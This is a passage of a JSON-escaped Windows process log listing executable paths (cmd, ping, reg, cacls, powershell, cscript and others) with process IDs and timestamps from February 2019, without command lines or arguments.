00:45:12.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x38c|2019-02-10 00:45:12.727000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xc4c|2019-02-10 00:45:12.747000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0xc98|2019-02-10 00:45:25.893000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x8c4|2019-02-10 00:45:25.910000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x16e0|2019-02-10 00:45:40.450000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x684|2019-02-10 00:45:40.470000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x1398|2019-02-10 00:45:53.590000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xeac|2019-02-10 00:45:53.627000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x394|2019-02-10 00:46:06.780000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1f60|2019-02-10 00:46:06.810000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x1904|2019-02-10 00:46:19.930000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1614|2019-02-10 00:46:19.950000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x834|2019-02-10 00:46:33.137000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xf3c|2019-02-10 00:46:33.167000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x2388|2019-02-10 00:46:46.277000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xe10|2019-02-10 00:46:46.293000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x16d4|2019-02-10 00:46:59.423000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xbe4|2019-02-10 00:46:59.450000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1280|2019-02-10 00:47:12.563000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x14ec|2019-02-10 00:47:12.593000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0x22c0|2019-02-10 00:47:25.723000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1b64|2019-02-10 00:47:25.740000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x2080|2019-02-10 00:47:38.850000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x23ec|2019-02-10 00:47:38.887000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x10a8|2019-02-10 00:47:52.007000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x490|2019-02-10 00:47:52.020000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x203c|2019-02-10 00:48:05.117000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x21b0|2019-02-10 00:48:05.143000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xb00|2019-02-10 00:48:18.287000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x1d38|2019-02-10 00:48:18.353000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0xfcc|2019-02-10 00:48:18.367000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x21c8|2019-02-10 00:48:18.387000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x94c|2019-02-10 00:48:18.443000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x7fc|2019-02-10 00:48:37.320000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x8f8|2019-02-10 00:48:37.347000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x1250|2019-02-10 00:48:59.900000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1c84|2019-02-10 00:48:59.923000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1d34|2019-02-10 00:49:13.023000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1704|2019-02-10 00:49:13.053000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x21d4|2019-02-10 00:49:30.207000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x834|2019-02-10 00:49:30.227000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x1fd0|2019-02-10 00:49:57.507000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xcc8|2019-02-10 00:49:57.533000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xb48|2019-02-10 00:50:10.643000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1834|2019-02-10 00:50:10.677000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0x2164|2019-02-10 00:50:26.817000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x19c8|2019-02-10 00:50:26.837000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x2080|2019-02-10 00:50:52.073000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ed4|2019-02-10 00:50:52.440000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2008|2019-02-10 00:50:52.450000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1040|2019-02-10 00:50:52.467000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0xd80|2019-02-10 00:51:17.663000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x19a8|2019-02-10 00:51:17.687000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x17d8|2019-02-10 00:51:42.923000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x21c8|2019-02-10 00:51:43.013000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x1be0|2019-02-10 00:52:08.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x108c|2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xccc|2019-02-10 00:52:09.227000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17a4|2019-02-10 00:52:09.243000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0x1984|2019-02-10 00:52:09.277000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x1ca4|2019-02-10 00:52:09.290000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x1a44|2019-02-10 00:52:09.307000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x7fc|2019-02-10 00:52:09.357000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x1b10|2019-02-10 00:52:09.383000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xe04|2019-02-10 00:52:09.403000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x12f8|2019-02-10 00:52:09.427000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x2170|2019-02-10 00:52:09.440000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1bc0|2019-02-10 00:52:09.460000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0xa24|2019-02-10 00:52:09.487000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x22a8|2019-02-10 00:52:09.503000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x394|2019-02-10 00:52:09.547000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x8f8|2019-02-10 00:52:09.557000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1250|2019-02-10 00:52:09.607000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x2364|2019-02-10 00:52:09.663000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x9ec|2019-02-10 00:52:34.923000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1260|2019-02-10 00:52:34.963000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0xe08|2019-02-10 00:53:00.197000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x23d4|2019-02-10 00:53:00.220000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xb4|2019-02-10 00:53:25.447000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1278|2019-02-10 00:53:25.473000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x53c|2019-02-10 00:53:50.723000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x974|2019-02-10 00:53:50.740000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x1720|2019-02-10 00:54:15.967000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1fc0|2019-02-10 00:54:15.990000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1af0|2019-02-10 00:54:41.217000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1ea0|2019-02-10 00:54:41.247000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0x1850|2019-02-10 00:55:06.503000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x11f0|2019-02-10 00:55:06.520000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x1928|2019-02-10 00:55:31.747000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c20|2019-02-10 00:55:32.707000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1d08|2019-02-10 00:55:32.723000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xed4|2019-02-10 00:55:32.740000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0xe50|2019-02-10 00:55:57.930000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x684|2019-02-10 00:55:57.947000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0xf58|2019-02-10 00:56:23.183000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x13e0|2019-02-10 00:56:23.203000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0xcc0|2019-02-10 00:56:48.420000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x3c4|2019-02-10 00:56:48.490000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1914|2019-02-10 00:57:13.700000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xc14|2019-02-10 00:57:13.730000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0xe60|2019-02-10 00:57:38.920000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1990|2019-02-10 00:57:38.940000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1420|2019-02-10 00:58:04.147000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1d90|2019-02-10 00:58:04.180000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x15c8|2019-02-10 00:58:29.450000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xfcc|2019-02-10 00:58:29.463000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x17a8|2019-02-10 00:58:54.643000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x212c|2019-02-10 00:58:54.673000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x8c4|2019-02-10 00:59:19.897000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1c24|2019-02-10 00:59:19.930000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0x1250|2019-02-10 00:59:45.177000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1d9c|2019-02-10 00:59:45.200000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0xc4c|2019-02-10 01:00:10.450000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x648|2019-02-10 01:00:10.500000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x12e0|2019-02-10 01:00:35.720000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xbe4|2019-02-10 01:00:35.747000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0xc1c|2019-02-10 01:01:01.007000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x203c|2019-02-10 01:01:01.030000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1e8c|2019-02-10 01:01:26.257000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xc80|2019-02-10 01:01:26.323000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x1080|2019-02-10 01:01:51.563000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1e44|2019-02-10 01:01:51.587000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x1804|2019-02-10 01:02:16.817000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1e30|2019-02-10 01:02:16.843000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xd74|2019-02-10 01:02:42.083000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x162c|2019-02-10 01:02:42.147000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xcec|2019-02-10 01:03:10.360000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x10d0|2019-02-10 01:03:10.380000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x1d54|2019-02-10 01:03:17.447000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x23d4|2019-02-10 01:03:17.473000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x12c4|2019-02-10 01:03:35.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x23d8|2019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1868|2019-02-09 21:44:46.750000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x594|2019-02-09 21:44:46.923000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2080|2019-02-09 21:44:46.937000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x23e8|2019-02-09 21:44:46.950000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0xc68|2019-02-09 21:44:52.010000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x67c|2019-02-09 21:44:52.027000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xf80|2019-02-09 21:56:28.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xd98|2019-02-09 21:56:28.403000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6c0|2019-02-09 21:56:28.413000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x17d8|2019-02-09 21:56:28.427000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0xdb0|2019-02-09 21:56:35.493000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x770|2019-02-09 21:56:35.510000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0xfcc|2019-02-09 21:56:43.593000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1714|2019-02-09 21:56:43.613000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0xd60|2019-02-09 21:56:45.653000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1588|2019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0xf08|2019-02-09 21:56:46.590000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x22a8|2019-02-09 21:56:46.607000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x594|2019-02-09 21:56:46.623000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x11cc|2019-02-09 21:56:46.640000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x850|2019-02-09 21:56:46.667000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x2384|2019-02-09 21:56:46.677000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xda4|2019-02-09 21:56:46.690000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x1e44|2019-02-09 21:56:46.700000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1770|2019-02-09 21:56:46.713000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0x12cc|2019-02-09 21:56:46.740000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0xbd0|2019-02-09 21:56:46.753000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x67c|2019-02-09 21:56:46.767000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x1b50|2019-02-09 21:56:46.780000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xfd4|2019-02-09 21:56:46.793000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x16e0|2019-02-09 21:56:46.840000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x8c4|2019-02-09 21:56:56.933000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1ac4|2019-02-09 21:56:56.957000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x2278|2019-02-09 21:57:25.140000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x154c|2019-02-09 21:57:25.160000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x12bc|2019-02-09 22:02:05.287000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x1734|2019-02-09 22:02:26.477000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x123c|2019-02-09 22:02:26.493000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x550|2019-02-09 22:02:27.520000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1680|2019-02-09 22:02:27.543000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xc98|2019-02-09 22:02:28.570000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x16fc|2019-02-09 20:28:02.213000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x5ac|2019-02-10 01:28:02.250000\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe|0x1770|2019-02-10 01:48:41.643000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x21f4|2019-02-10 01:48:41.673000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0xfe0|2019-02-10 02:28:02.243000\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe|0x17ac|2019-02-10 02:37:21.853000\",\"c:\\\\windows\\\\system32\\\\apphostregistrationverifier.exe|0x1e68|2019-02-10 03:00:00.720000\",\"c:\\\\windows\\\\system32\\\\usoclient.exe|0x53c|2019-02-10 03:06:45.883000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x107c|2019-02-10 03:06:45.900000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x1934|2019-02-10 03:28:02.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xfbc|2019-02-10 03:44:47.260000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2d0|2019-02-10 03:44:47.453000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x5c|2019-02-10 03:44:47.470000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x23a4|2019-02-10 03:44:47.487000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0x11f0|2019-02-10 03:44:57.607000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xb00|2019-02-10 03:44:57.623000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0xb48|2019-02-10 03:45:14.760000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x2068|2019-02-10 03:45:14.783000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x16e8|2019-02-10 03:45:32.930000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe60|2019-02-10 03:45:33.873000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1fe8|2019-02-10 03:45:33.890000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0x107c|2019-02-10 03:45:33.920000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x9f0|2019-02-10 03:45:33.937000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x974|2019-02-10 03:45:33.967000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x2378|2019-02-10 03:45:34.187000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x1004|2019-02-10 03:45:34.213000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x848|2019-02-10 03:45:34.233000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x162c|2019-02-10 03:45:34.260000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x1ce4|2019-02-10 03:45:34.270000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1be0|2019-02-10 03:45:34.290000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0xd74|2019-02-10 03:45:34.317000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x1d44|2019-02-10 03:45:34.330000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x48c|2019-02-10 03:45:34.547000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x19f0|2019-02-10 03:45:34.560000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x5c4|2019-02-10 03:45:34.583000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1db4|2019-02-10 03:45:34.633000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x12cc|2019-02-10 03:45:47.757000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1df8|2019-02-10 03:45:47.787000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x1ff8|2019-02-10 03:46:17.050000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xd78|2019-02-10 03:46:17.073000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xdd0|2019-02-10 03:46:32.210000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x12f8|2019-02-10 03:46:32.243000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xf94|2019-02-10 03:46:57.410000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1eb4|2019-02-10 03:46:57.427000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x58|2019-02-10 03:47:08.507000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x135c|2019-02-10 03:47:08.527000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1b28|2019-02-10 03:47:13.587000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1e60|2019-02-10 03:47:13.610000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0xf90|2019-02-10 03:47:13.623000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x508|2019-02-10 03:47:13.637000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x21b0|2019-02-10 03:47:36.837000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x378|2019-02-10 03:47:37.793000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2168|2019-02-10 03:47:37.810000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x254|2019-02-10 03:47:37.827000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0x2328|2019-02-10 03:48:01.003000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1834|2019-02-10 03:48:01.020000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0xcc0|2019-02-10 03:48:24.217000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x15f8|2019-02-10 03:48:24.237000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x1f7c|2019-02-10 03:48:48.320000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2274|2019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0x22fc|2019-02-10 03:48:49.287000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x15c0|2019-02-10 03:48:49.297000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x19c8|2019-02-10 03:48:49.317000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x19e8|2019-02-10 03:48:49.327000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0xf98|2019-02-10 03:48:49.350000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xbbc|2019-02-10 03:48:49.370000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb70|2019-02-10 03:48:49.387000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x1590|2019-02-10 03:48:49.400000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x2298|2019-02-10 03:48:49.417000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0xe58|2019-02-10 03:48:49.433000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x15e4|2019-02-10 03:48:49.447000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x1f00|2019-02-10 03:48:49.463000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x2384|2019-02-10 03:48:49.477000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xa24|2019-02-10 03:48:49.490000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1070|2019-02-10 03:48:49.557000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1df4|2019-02-10 03:49:12.813000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x2044|2019-02-10 03:49:12.843000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x1520|2019-02-10 03:49:36.040000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xedc|2019-02-10 03:49:36.060000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1634|2019-02-10 03:49:59.250000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1b28|2019-02-10 03:49:59.270000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xd7c|2019-02-10 03:50:22.487000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x182c|2019-02-10 03:50:22.503000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x2070|2019-02-10 03:50:45.727000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1f2c|2019-02-10 03:50:45.753000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x6f8|2019-02-10 03:51:08.927000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x10c4|2019-02-10 03:51:08.957000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0x1de4|2019-02-10 03:51:32.143000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x5ac|2019-02-10 03:51:32.160000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x864|2019-02-10 03:51:55.353000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x518|2019-02-10 03:51:56.143000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x1d44|2019-02-10 03:52:19.353000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x48c|2019-02-10 03:52:19.367000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0xb10|2019-02-10 03:52:42.607000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x5c4|2019-02-10 03:52:42.633000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x23ec|2019-02-10 03:53:05.823000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xde4|2019-02-10 03:53:05.887000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x20e4|2019-02-10 03:53:15.997000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x838|2019-02-10 03:53:16.010000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x1914|2019-02-10 03:53:35.160000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1860|2019-02-10 03:53:35.183000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1f7c|2019-02-10 03:53:45.243000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe|0x1454|2019-02-10 04:08:29.150000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x7c0|2019-02-10 04:08:29.163000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe|0x1844|2019-02-10 04:08:35.177000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x900|2019-02-10 04:08:35.183000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x22c0|2019-02-10 04:28:02.247000\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe|0x1ef4|2019-02-10 04:32:15.793000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x11ec|2019-02-10 04:32:15.800000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe|0x1d3c|2019-02-10 05:10:21.810000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x2010|2019-02-10 05:10:21.820000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x1fa4|2019-02-10 05:28:02.243000\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe|0x195c|2019-02-10 06:00:00.807000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe|0x600|2019-02-10 06:21:59.853000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0xc60|2019-02-10 